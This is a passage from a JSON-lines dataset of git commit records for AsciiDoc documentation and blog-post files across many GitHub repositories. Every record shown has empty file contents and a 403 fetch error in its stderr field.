ch,acchen97\/elasticsearch,cnfire\/elasticsearch-1,coding0011\/elasticsearch,jsgao0\/elasticsearch,myelin\/elasticsearch,lightslife\/elasticsearch,MichaelLiZhou\/elasticsearch,mmaracic\/elasticsearch,TonyChai24\/ESSource,NBSW\/elasticsearch,mortonsykes\/elasticsearch,markharwood\/elasticsearch,lightslife\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,easonC\/elasticsearch,girirajsharma\/elasticsearch,xingguang2013\/elasticsearch,linglaiyao1314\/elasticsearch,rlugojr\/elasticsearch,areek\/elasticsearch,LeoYao\/elasticsearch,dongjoon-hyun\/elasticsearch,Ansh90\/elasticsearch,beiske\/elasticsearch,dongjoon-hyun\/elasticsearch","old_file":"docs\/reference\/index-modules\/translog.asciidoc","new_file":"docs\/reference\/index-modules\/translog.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ac56441da7d53dad8cff86f2602f0a68359d07","subject":"Update 2014-01-19-Piwik-Javatracker.adoc","message":"Update 2014-01-19-Piwik-Javatracker.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2014-01-19-Piwik-Javatracker.adoc","new_file":"_posts\/2014-01-19-Piwik-Javatracker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac6bf03f63d5d2292bd4a220c29088b13e4052ea","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36af226bd0ecf9bb1e81fca93f71e58ace120666","subject":"Correct ASCIIDoc format","message":"Correct ASCIIDoc format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"87f4cdecd1e6a564916723ad59df8959a7395560","subject":"Update 2018-07-18-float.adoc","message":"Update 2018-07-18-float.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-18-float.adoc","new_file":"_posts\/2018-07-18-float.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a1ff2192daa9b94f5f33a596fa8edc6b87fc17","subject":"Updated documentation","message":"Updated documentation\n","repos":"storozhukBM\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7427b340435427316f2e22d361aa3e86e1556ed","subject":"Tidy.","message":"Tidy.\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1755f1a9c63588ac0d8d28ede9a0573c09d55483","subject":"Updated README","message":"Updated README\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e7b2f970e10291b2a9ed5c3a16c5399500b436b","subject":"fix typo; add Asciidoctor link","message":"fix typo; add Asciidoctor link\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87df13e48a26e2420ba817eb35e22a9bde39daff","subject":"Add paragraph on development process in README","message":"Add paragraph on development process in README\n","repos":"gwidgets\/gwt-project-generator,Arsene07\/forge,bclozel\/initializr,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,gwidgets\/gwt-project-generator,spring-io\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator,snicoll\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,snicoll\/initializr,bclozel\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,bclozel\/initializr,snicoll\/initializr,spring-io\/initializr,spring-io\/initializr,Arsene07\/forge,Arsene07\/forge,nevenc-pivotal\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c64f65f25b3530795a5431ec57cb2357f78ee98","subject":"fix badge","message":"fix badge\n","repos":"binout\/jaxrs-unit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/jaxrs-unit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62b557d2e2934cad982adf5994ac76e8f09289e2","subject":"Update 2015-12-25-Removing-commit-from-git.adoc","message":"Update 2015-12-25-Removing-commit-from-git.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2015-12-25-Removing-commit-from-git.adoc","new_file":"_posts\/2015-12-25-Removing-commit-from-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"101c3abf20e4a2541e5ee78d9fb287f38dfd6544","subject":"Update 2015-08-13-Cursos-de-Hubpress-Profesional.adoc","message":"Update 2015-08-13-Cursos-de-Hubpress-Profesional.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-13-Cursos-de-Hubpress-Profesional.adoc","new_file":"_posts\/2015-08-13-Cursos-de-Hubpress-Profesional.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"427de53a5079588f8316a2805bef58d7e971a82d","subject":"y2b create post They Tried To Shrink An iPhone...","message":"y2b create post They Tried To Shrink An iPhone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-11-They-Tried-To-Shrink-An-iPhone.adoc","new_file":"_posts\/2016-09-11-They-Tried-To-Shrink-An-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fafa3937b201b203f3b62388367053774811111","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a4b86d384e88f2fc1f1d517d4c9aebb6578900","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc9e036b2d23386a885488f9227eb2cbbc16be8","subject":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","message":"Update 2017-01-01-Lets-learn-Haskell-with-Physics.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_file":"_posts\/2017-01-01-Lets-learn-Haskell-with-Physics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0be4a224bad2490f1f383cdf54d6bc4759554560","subject":"Update 2018-02-26-How-to-undoing-changes-with-Git.adoc","message":"Update 2018-02-26-How-to-undoing-changes-with-Git.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-02-26-How-to-undoing-changes-with-Git.adoc","new_file":"_posts\/2018-02-26-How-to-undoing-changes-with-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de2f27831fa5fbc43fcee0e037edb7facd7df83","subject":"Update 2015-10-14-Hello-World.adoc","message":"Update 2015-10-14-Hello-World.adoc","repos":"codelab-lbernard\/blog,codelab-lbernard\/blog,codelab-lbernard\/blog","old_file":"_posts\/2015-10-14-Hello-World.adoc","new_file":"_posts\/2015-10-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codelab-lbernard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f4623b81f35f4143c92196cf5c643dd4039cd2","subject":"Update 2016-05-10-Asciidoctor.adoc","message":"Update 2016-05-10-Asciidoctor.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io","old_file":"_posts\/2016-05-10-Asciidoctor.adoc","new_file":"_posts\/2016-05-10-Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f401dc6f6a1b3324c56a75168696c4386e8dd12","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9df758f6e43a2556a84e351ebd5aac72e5c10233","subject":"Update 2017-04-05-FPM-chat-log.adoc","message":"Update 2017-04-05-FPM-chat-log.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-FPM-chat-log.adoc","new_file":"_posts\/2017-04-05-FPM-chat-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e28c16230deb336d6f1e4d356cd123c6a9125485","subject":"Update 2017-05-31-Java-Classes.adoc","message":"Update 2017-05-31-Java-Classes.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-Classes.adoc","new_file":"_posts\/2017-05-31-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ee19af0623f88ba46005a38f498f8443c580b1","subject":"Update 2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","message":"Update 2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","new_file":"_posts\/2016-01-12-UISearchBar-Customization-and-UISearchController-Replacement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eafc420b9cb8d1fd92ddb0bf5f8ba0c54c3de0c","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c24c78e1c5a9979a3917390c169091741ed8c09a","subject":"fix typo in word environment","message":"fix typo in word environment","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db7493c3374f13229d84a51e0dd711d9ab8059e7","subject":"removed point about cerr and unitbuf","message":"removed point about cerr and unitbuf\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adc62ccadfc526bb426a23ee99bf39a932c455a3","subject":"1.4 release blog","message":"1.4 release blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-06-22-release-1.4.adoc","new_file":"_blog-src\/_posts\/2018-06-22-release-1.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad927834a914cd03f781b68e7da046b1f2bcb7cd","subject":"y2b create post GIVEAWAY ANNOUNCEMENT","message":"y2b create post GIVEAWAY ANNOUNCEMENT","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-23-GIVEAWAY-ANNOUNCEMENT.adoc","new_file":"_posts\/2012-01-23-GIVEAWAY-ANNOUNCEMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a869f1967c7baa62431269d61835ba55fbb94164","subject":"Update 2016-04-12-Reflections-on-Ethics.adoc","message":"Update 2016-04-12-Reflections-on-Ethics.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Reflections-on-Ethics.adoc","new_file":"_posts\/2016-04-12-Reflections-on-Ethics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88eabc248497220bb207baf1db955e0ed07131d5","subject":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","message":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"229f471e9cfde67aec819b36f5fbe0690e4b2357","subject":"Changes to time zone keys documentation","message":"Changes to time zone keys documentation\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Time zone keys.asciidoc","new_file":"documentation\/Time zone keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5aa71cdbd28eaef27d406cc42a53fad8d638640b","subject":"recreate article","message":"recreate article\n","repos":"rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org","old_file":"news\/2015-10-26-WildFly902-Released.adoc","new_file":"news\/2015-10-26-WildFly902-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69508bcb86287898d9e60319ba3d43bcff19139c","subject":"Update 2016-02-15-.adoc","message":"Update 2016-02-15-.adoc","repos":"hang-h\/hubpress.io,hang-h\/hubpress.io,hang-h\/hubpress.io,hang-h\/hubpress.io","old_file":"_posts\/2016-02-15-.adoc","new_file":"_posts\/2016-02-15-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hang-h\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b53b0f8e0803b6076212d0e47372814034aab44","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8903879a579299fae3b426bb367f529ee56cca18","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"374279a1ceb29ea9b403157b34ca020b3075f420","subject":"Create Reference.adoc","message":"Create Reference.adoc","repos":"igagis\/prorab,igagis\/prorab","old_file":"wiki\/Reference.adoc","new_file":"wiki\/Reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/prorab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d8ebe609def23c52bd0e7a83902cd052d66a7c","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e23b98b2d28505ad3abe0606176c986070e31b4","subject":"add lab05","message":"add lab05\n","repos":"slbedu\/javase8-2016","old_file":"lab05\/README.adoc","new_file":"lab05\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9697774cc268bb5275c0e4573624f4f98bc6168","subject":"hawkular java agent blog (#290)","message":"hawkular java agent blog (#290)\n\n","repos":"objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/24\/hawkular-java-agent.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/24\/hawkular-java-agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75dfcb3fdd503b15f10876816db5042d3c0f15c5","subject":"Draft Servlet perf blog","message":"Draft Servlet perf blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2017-05-15-tuning-servlet-gateway.adoc","new_file":"_blog-src\/_posts\/2017-05-15-tuning-servlet-gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecc6bd59be1cb59bc37728c080059ab31997b56b","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04de1fb36e933c7c9e4723db42ff65f249b3d19b","subject":"Draft document describing the overall goals and constraints for the Bazaar Scheduling scheme","message":"Draft document describing the overall goals and constraints for the Bazaar Scheduling scheme\n","repos":"valpo-sats\/scheduling-bazaar,valpo-sats\/scheduling-bazaar","old_file":"notes\/scheduling-bazaar.adoc","new_file":"notes\/scheduling-bazaar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/valpo-sats\/scheduling-bazaar.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b3e59ef60cc593245acf0b7e621cf44fe610a86e","subject":"Update 2015-04-29-Test.adoc","message":"Update 2015-04-29-Test.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-29-Test.adoc","new_file":"_posts\/2015-04-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6012778981281078e2e9eb078c0ea718fc6882ec","subject":"Update 2017-08-10-FWFW.adoc","message":"Update 2017-08-10-FWFW.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-10-FWFW.adoc","new_file":"_posts\/2017-08-10-FWFW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1cc1297e632ac825bdb8829136f355b7249651","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3796a8878ae1b242b331288a44ab76a4e1fbe85a","subject":"Add contribution guide","message":"Add contribution 